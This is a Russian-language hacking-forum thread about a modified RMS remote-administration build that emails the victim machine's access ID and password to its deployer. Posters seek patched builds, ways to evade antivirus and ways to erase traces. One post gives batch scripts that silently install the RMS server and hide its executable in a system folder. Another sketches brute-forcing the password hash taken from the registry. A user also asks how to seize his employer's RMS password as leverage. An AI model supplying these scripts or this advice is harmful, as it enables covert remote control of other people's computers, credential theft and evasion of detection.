RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. spiritors123
    spiritors123 Новичок
    Симпатии:
    0
    scandalist,
    помогите)) вчера все работало как нужно. но теперь даже в диспечере задач нету процесса rutserv.exe на почте пусто папка sysfiles есть файлы там тоже есть только сам сервер не запускаеться делал по инструкции
     
    5 ноя 2012
  2. Alser777
    Alser777 Новичок
    Симпатии:
    0
    Пожалуйста перезалейте файл! или дайте рабочую ссылку
     
    5 ноя 2012
  3. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    А поточнее на что ссылку перезалить? И про какой файл речь
     
    5 ноя 2012
  4. spiritors123
    spiritors123 Новичок
    Симпатии:
    0
    4ekkk,
    не знаешь в чем проблема?
    пост выше прочитай
     
    5 ноя 2012
  5. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Не будем флудить все вопросы в личку!
     
    6 ноя 2012
  6. Alser777
    Alser777 Новичок
    Симпатии:
    0
    Я имел ввиду ссылку на зборку. ато на депозите ее удалили если не трудно конечно
     
    7 ноя 2012
  7. nebra
    nebra Новичок
    Симпатии:
    13
    Ребята кто не будь смог убрать:разрешения на отправку ид на почту?
     
    8 ноя 2012
  8. spiritors123
    spiritors123 Новичок
    Симпатии:
    0
    Судари скиньте пожалуйста патченые файлы для rms 5.3:)
     
    8 ноя 2012
  9. sekVAren
    sekVAren Новичок
    Симпатии:
    2
    Дублирую свой вопрос: Допустим я нахожусь за компом на котором установлен RMS сервер. Есть ли у меня возможность узнать пароль от него???

    Добавлено через 3 минуты
    Если нет, то зная ай ди возможно ли брутом или взломом удалённо его вычислить?
     
    Последнее редактирование: 10 ноя 2012
    10 ноя 2012
  10. andrian84
    andrian84 Новичок
    Симпатии:
    0
    хорошая статья СП
     
    10 ноя 2012
  11. scandalist
    scandalist Новичок
    Симпатии:
    3
    Можно выдернуть настройки сервера из реестра. Там есть хэш пароля длиной 128 Hex. Я проверял на нескольких машинах каждому паролю соответствует свой уникальный хэш. Далее лезем внутрь программы и выясняем как пароль пересчитывается в хэш. И пишем свой брутфорсер или если повезет через Rainbow таблицы.
    То же самое и с сетевым взломом. Пишем свою программу и ломаем.
     
    11 ноя 2012
  12. bayan
    bayan Новичок
    Симпатии:
    0
    привет всем.наконец дочитал форум до конца и интересуют несколько вопросов.
    1.можно ли отследить хозяина сборки из зараженного компа? (если спалили прогу)
    2.оставляет ли прога после удаления данные реестра?
    3.и если кто умеет ,может сделать правильный батник для удаления сервера вместе с чисткой реестра,чтоб не отавалось никаких следов?
    4.палят ее антивирусы всетаки или нет?
    5.почему прога не устанавливается с флешки,а только когда перекачаешь ее на рабочий стол.
    если всетаки есть умные головы которые могут ответить ,прошу не игнорировать,заранее спасибо
     
    13 ноя 2012
  13. scandalist
    scandalist Новичок
    Симпатии:
    3
    Не тот форум читал, я так думаю...
    1. Если соединяешься не через Internet-ID а напрямую, то можно отловить твой IP. Если остался на на машине жертвы MSI то пошаманив, можно заставить показать email на который шлется ID. Если за компом посидел знакомый компьютерщик Вася, а потом из него полезли зверушки, то виноватого долго искать не придется.
    2. Оставляет.
    3. Батники в теме выкладывались.
    4. Какие антивирусы, с какими базами, какую версию программы?
    5. С чего Вы взяли? Обычно всё работает. Может так политика безопасности на данной машине настроена?
     
    14 ноя 2012
  14. nebra
    nebra Новичок
    Симпатии:
    13
    1.можно отследить,если что-то серьезное натворили!
    2.если написать код в батнике для удаления,то все удалится без следов
    4.смотря как вы будите собирать,я собираю не палит не одним антивиром
    5.что за формат,MSI?
     
    14 ноя 2012
  15. sekVAren
    sekVAren Новичок
    Симпатии:
    2
    1. Где в реестре найти "хэш пароля"? И какова вероятность что я смогу расшивровать?

    2. Насколько это сложно?

    Добавлено через 2 часа 37 минут
    Прошу прощения за глупые вопросы - пишу быстро дабы избежать палево. Сейчас опишу вкратце ситуацию, что бы было ясно что мне можно посоветовать. ПРОШУ НЕ ИГНОРИРОВАТЬ, ОБРАТИТЬ ВНИМАНИЕ И ПОМОЧЬ! Иначе буду писать каждому в личку.

    Итак. Господа хакеры просвещёные :)) У меня есть доступ к компьютерам компании, в которой я работаю. На всех компьютерах установлен РМС с целью наблюдения за работниками. Возникла вероятность что мне не выплатят зарплату, и я что бы получить какие то гарантии хочу узнать пароль от РМС (как его использовать - вариантов много, можно будет определиться в будущем, по ситуации)

    Итак. Я знаю ай ди, я имею доступ к компьютерам в течении длительного времени. Скажите пожалуйста какой 100 % вариант узнать пароль? Существует ли он вообще? Уровень сложности не важен - со всеми нюансами я смогу спокойно разобраться дома. ВАЖНО ЧТО БЫ ВАРИАНТ БЫЛ СТОПРОЦЕНТНЫЙ!

    Спасибо большое за внимание, прошу помочь - Земля круглая, я буду благодарен.
     
    Последнее редактирование: 14 ноя 2012
    14 ноя 2012
  16. bayan
    bayan Новичок
    Симпатии:
    0
    версия программы 5.1 beta3.
    антивирусы:каспер,нод-32,trend micro internet security
    install cmd-
    @chcp 1251
    @MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
    @MsiExec /x {11A90858-40BB-4858-A2DA-CA6495B5E907} /qn REBOOT=ReallySuppress
    @ping 127.0.0.1
    @MsiExec /I "rms.server5.1b1ru.msi" /qn




    bat-
    @echo off

    mkdir %systemroot%\system32\sysfiles

    copy /y "RMS.exe" "%SystemRoot%\system32\sysfiles\RMS.exe"

    attrib +s +h +r "%SystemRoot%/system32/sysfiles/RMS.exe"


    cd %SystemRoot%\system32\sysfiles
    start RMS.exe

    exit
     
    14 ноя 2012
  17. passer_by
    passer_by Новичок
    Симпатии:
    0
    хром сразу заблокировал закачку RMS
     
    15 ноя 2012
  18. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Пишу для Сани2021 пароль на архив 123123 только сборка уже не актуальна
     
    15 ноя 2012
  19. scalpel
    scalpel Новичок
    Симпатии:
    4
    Наивный парень!И так же потом можно восстановить.Нужно сначала затирать содержимое файла а потом уже удалять.
     
    15 ноя 2012
  20. bayan
    bayan Новичок
    Симпатии:
    0
    люди ну подскажите про батник на удаление rms, вместе с чисткой реестра и всех следов присутствия программы.
     
    16 ноя 2012
Статус темы:
Закрыта.
Загрузка...